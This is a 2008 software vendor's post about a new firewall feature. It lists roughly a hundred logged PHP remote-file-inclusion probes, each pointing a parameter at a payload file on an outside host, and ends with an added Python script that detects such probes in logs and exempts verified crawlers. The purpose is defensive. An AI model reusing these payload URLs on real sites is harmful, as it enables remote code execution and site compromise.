Firewall

by Master Developer (April 27, 2008 9:33:23 PM)

While going through the access statistics we came across some interesting (though unsuccessful) PHP injection attempts, in which the attacker tries to exploit an incorrectly configured php.ini on the server. The attack works by assuming that the file passed in a parameter is handed to include(). By slipping in his own code, the attacker compromises the site.

Visual PHP™ is immune to attacks of this kind, but we nevertheless decided to implement an internal firewall so that the statistics are not distorted. You can configure the firewall yourself to block IP addresses. Before blocking an IP we recommend checking that the IP does not belong to one of the search-engine robots. Attackers use a simple trick: they do not launch the attack directly, but place a link on web pages and let visitors or robots do the work for them.

Here is a listing of the individual attempts. As you can see, they are not aimed directly at our product. The attacker tries the same thing on other domains and apparently assumes that our site runs on some other CMS (e.g. the attack on Joomla via mosConfig_absolute_path).

http://www.visual-php.com//index.php?product=http://www.schmid-telecom.com/privz.txt????????????????????????
http://www.visual-php.com/?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg?
http://www.visual-php.com/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?
http://www.visual-php.com/?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy?
http://www.visual-php.com/cs/jak-system-funguje/system.php?System=http://www.lankawe.com/ioncube/readme.txt??
http://www.visual-php.com/documents.php?language=cs&mid=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/documents.php?language=cs&mid=http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://www.visual-php.com/documents.php?language=cs&mid=http://www.unduetretoccaate.it/codice/fog/iyi/
http://www.visual-php.com/documents.php?language=cs&mid=c4...f2-102b-bbd4-74b73c0566ef/kontakt.php?k=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/documents.php?language=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef
http://www.visual-php.com/documents.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/documents.php?language=http://httpparty.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/documents.php?language=http://workersparty.chat.ru/images?
http://www.visual-php.com/documents.php?language=http://yoshishome.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://httpparty.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/documents.php?mid=http://workersparty.chat.ru/images?
http://www.visual-php.com/documents.php?mid=http://yoshishome.chat.ru/images?
http://www.visual-php.com/en/product-sale-in-few-months//index.php?product=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/en/product-sale-in-few-months//index.php?product=http://www.schmid-telecom.com/privz.txt????????????????????????
http://www.visual-php.com/en/product-sale-in-few-months/index.php?prod=http://lineagezone.no-ip.org/je/sp/id.txt???
http://www.visual-php.com/en/product-sale-in-few-months/index.php?product=http://gukmin.or.kr/bbs/id.txt???
http://www.visual-php.com/en/product-sale-in-few-months/index.php?product=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/forms.php?language=cs&mid=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.filter-international.com/webservice/aro/medavuw/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/forms.php?language=cs&mid=http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.visual-php.com/forms.php?language=http://www.municipioxii.it/sunnyway/igodoq/bukosud/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/forms.php?language=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/forms.php?language=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/&mid=24b6db3e-19a1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/index.php?a=http://xxxxxx.xxxxx.xxx.gif?
http://www.visual-php.com/index.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/index.php?page=http://www.rlsusa.com/test.txt??
http://www.visual-php.com/index.php?prod=http://lineagezone.no-ip.org/je/sp/id.txt???
http://www.visual-php.com/index.php?product=http://gukmin.or.kr/bbs/id.txt???
http://www.visual-php.com/index.php?product=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/jak-system-funguje/system.php?System=http://www.lankawe.com/ioncube/readme.txt??
http://www.visual-php.com/kontakt-e-vision/kontakt.php?k=http://test10.digitalis.com.pa/cache/id.txt??
http://www.visual-php.com/news.php?id=http://afterwedding.eclub.lv/images?
http://www.visual-php.com/news.php?id=http://httpparty.chat.ru/images?
http://www.visual-php.com/news.php?id=http://ironmanshome.chat.ru/images?
http://www.visual-php.com/news.php?id=http://myownmarriage.chat.ru/images?
http://www.visual-php.com/news.php?id=http://myweddingphotos.by.ru/images?
http://www.visual-php.com/news.php?id=http://workersparty.chat.ru/images?
http://www.visual-php.com/news.php?id=http://xishisniceplace.chat.ru/images?
http://www.visual-php.com/news.php?id=http://yoshishome.chat.ru/images?
http://www.visual-php.com/photogalleries.php?language=cs&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef&photogallery_items_page=1/*.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/photogalleries.php?language=cs&mid=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://203.71.212.3/www/modul/mic.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://gukmin.or.kr/bbs/id.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://kazehime.110mb.com/cmd/r6.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://n3bunel.ath.cx/safe.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://www.aeea1031.com/events/style.txt??
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://www.phanom.ac.th/msnlist/id.txt?
http://www.visual-php.com/photogalleries.php?language=cs&m...photogallery_items_page=1/*.php?page=http://zodila.ilive.ro/sistem.txt?????
http://www.visual-php.com/photogalleries.php?language=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://www.municipioxii.it/sunnyway/igodoq/bukosud/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://www.winbd.net/admin/jist_code/wowoz/opaxi/&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef
http://www.visual-php.com/photogalleries.php?language=http://amyru.h18.ru/images/cs.txt?
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://203.71.212.3/www/modul/mic.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://gukmin.or.kr/bbs/id.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://kazehime.110mb.com/cmd/r6.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://n3bunel.ath.cx/safe.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://www.aeea1031.com/events/style.txt??
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://www.phanom.ac.th/msnlist/id.txt?
http://www.visual-php.com/photogalleries.php?mid=88622ce2-...photogallery_items_page=1/*.php?page=http://zodila.ilive.ro/sistem.txt?????
http://www.visual-php.com/photogalleries.php?mid=88622ce2-14f1-102b-bbd4-74b73c0566ef&photogallery_items_page=1/*.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?
http://www.visual-php.com/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.blumade.it/gestione/selops/dosa.txt??????????????????????????????
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.channelnewsperu.com/imagenes/publicaciones/fotos/emesuki/ohuhud/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.filter-international.com/webservice/aro/medavuw/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.pattibus.it/phplib-7.2b/pages/godot/eridehi/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.stomol.ru/catalog/rivoz/vekudu/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.visual-php.com/scripts.php?language=cs&tid=http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/
http://www.visual-php.com/scripts.php?language=http://sans-packing.ru/img/jipeqap/ehudute/&tid=remote_install
http://www.visual-php.com/scripts.php?language=http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/&tid=remote_install
http://www.visual-php.com/scripts.php?language=http://www.unduetretoccaate.it/codice/fog/iyi/&tid=remote_install
http://www.visual-php.com/versions.php?id=http://visionswedding.chat.ru/images?
http://www.visual-php.com/versions.php?language=http://sans-packing.ru/img/jipeqap/ehudute/
http://www.visual-php.com/versions.php?language=http://www.northfans.ch/forum/admin/settings/ocoyo/azad/
http://www.visual-php.com/versions.php?language=http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/ogu/
http://www.visual-php.com/video_tutorials.php?id=http://myloversplace.chat.ru/images?
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.clubnataciotortosa.com/UserFiles/File/edut/jezin/
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.elettrodataservice.it/foto_articoli/pivafof/oqonon/
http://www.visual-php.com/video_tutorials.php?language=cs&id=ed46ceef-376a-102b-a08f-bdc08c7ed098&styleName=http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.filter-international.com/webservice/aro/medavuw/&styleName=fullscreen
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.northfans.ch/forum/admin/settings/ocoyo/azad/&styleName=fullscreen
http://www.visual-php.com/video_tutorials.php?language=cs&id=http://www.unduetretoccaate.it/codice/fog/iyi/&styleName=fullscreen

This feature can be found in the administration under the menu Tools->Firewall from version 1.7.6.85 onwards.
by: Master Developer (Technical support)
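As an added example (not code from the original post or from the Visual PHP product): a Python script that runs the detection the post describes over access-log lines, then separates the probing IPs into ones to block and ones that are verified search-engine crawlers lured into fetching an attacker-planted link. Only the request paths come from the listing above; the IP addresses, timestamps, user agents and DNS data are constructed for illustration, and the crawler check uses forward-confirmed reverse DNS with an injectable resolver so the demo runs offline. For reference, the php.ini settings the post alludes to are allow_url_fopen and (since PHP 5.2) allow_url_include; with those off, include() will not open a remote URL at all.

```python
"""Detect remote-file-inclusion (RFI) probes in access logs and flag crawlers.

Added example, not part of the forum post or the Visual PHP product.
Assumes Apache/nginx "combined"-style log lines and an optional caller-supplied
DNS resolver pair for the crawler check.
"""
import re
import socket
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (combined format). Request paths are from the post;
# IPs, timestamps and user agents are made up for illustration.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2008:20:01:12 +0200] "GET /index.php?product=http://www.schmid-telecom.com/privz.txt???????? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Apr/2008:20:01:13 +0200] "GET /?mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.23 - - [27/Apr/2008:20:05:44 +0200] "GET /documents.php?language=cs&mid=115f82a8-14f3-102b-bbd4-74b73c0566ef HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
198.51.100.23 - - [27/Apr/2008:20:05:51 +0200] "GET /photogalleries.php?language=cs&mid=88622ce2-14f1-102b-bbd4-74b73c0566ef&photogallery_items_page=1/*.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 7710 "-" "Mozilla/5.0"
66.249.66.1 - - [27/Apr/2008:20:07:02 +0200] "GET /scripts.php?language=http://sans-packing.ru/img/jipeqap/ehudute/&tid=remote_install HTTP/1.1" 200 2201 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A remote URL anywhere in a parameter value is what a naive include($_GET['x'])
# would fetch when allow_url_fopen/allow_url_include permit it. The trailing
# '?' padding seen in the post makes anything the script appends (e.g. ".php")
# land in the remote URL's query string, where the attacker's host ignores it.
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)

# Crawler rDNS domains (leading dot prevents "evilgooglebot.com" from matching).
CRAWLER_SUFFIXES = (".googlebot.com", ".google.com", ".search.msn.com")


def parse_log_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_params(target):
    """Return [(param, value)] for query parameters whose value carries a remote URL.
    Parameters that legitimately carry URLs (redirect targets) need an allowlist here."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.search(value)]


def scan_log(log_text):
    """Map source IP -> list of (target, param, value) for every RFI probe found."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if not rec:
            continue
        for param, value in find_rfi_params(rec["target"]):
            probes[rec["ip"]].append((rec["target"], param, value))
    return dict(probes)


def is_verified_crawler(ip, reverse_lookup=None, forward_lookup=None, suffixes=CRAWLER_SUFFIXES):
    """Forward-confirmed reverse DNS: the PTR name must end in a known crawler
    domain AND resolve back to the same IP (a User-Agent string proves nothing).
    Lookups default to the system resolver but are injectable for offline use."""
    reverse_lookup = reverse_lookup or (lambda a: socket.gethostbyaddr(a)[0])
    forward_lookup = forward_lookup or (lambda h: [socket.gethostbyname(h)])
    try:
        host = reverse_lookup(ip).rstrip(".").lower()
    except (socket.herror, socket.gaierror, KeyError):
        return False
    if not host.endswith(suffixes):
        return False
    try:
        return ip in forward_lookup(host)
    except (socket.gaierror, KeyError):
        return False


def block_candidates(log_text, reverse_lookup=None, forward_lookup=None):
    """Split probing IPs into (block, spare); spare holds verified crawlers that
    merely followed an attacker-planted link, as the post warns."""
    block, spare = [], []
    for ip in sorted(scan_log(log_text)):
        (spare if is_verified_crawler(ip, reverse_lookup, forward_lookup) else block).append(ip)
    return block, spare


# Constructed DNS data standing in for real lookups in the demo.
FAKE_RDNS = {"66.249.66.1": "crawl-66-249-66-1.googlebot.com"}
FAKE_FWD = {"crawl-66-249-66-1.googlebot.com": ["66.249.66.1"]}

if __name__ == "__main__":
    block, spare = block_candidates(SAMPLE_LOG, FAKE_RDNS.__getitem__, FAKE_FWD.__getitem__)
    print("block:", block)
    print("verified crawlers, do not block:", spare)
```

Run it against a real log by replacing SAMPLE_LOG with the file contents and dropping the fake resolvers; the IPs left in `block` are the ones worth entering into a firewall such as the one described in the post, and the ones in `spare` are the crawlers the post warns against blocking.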
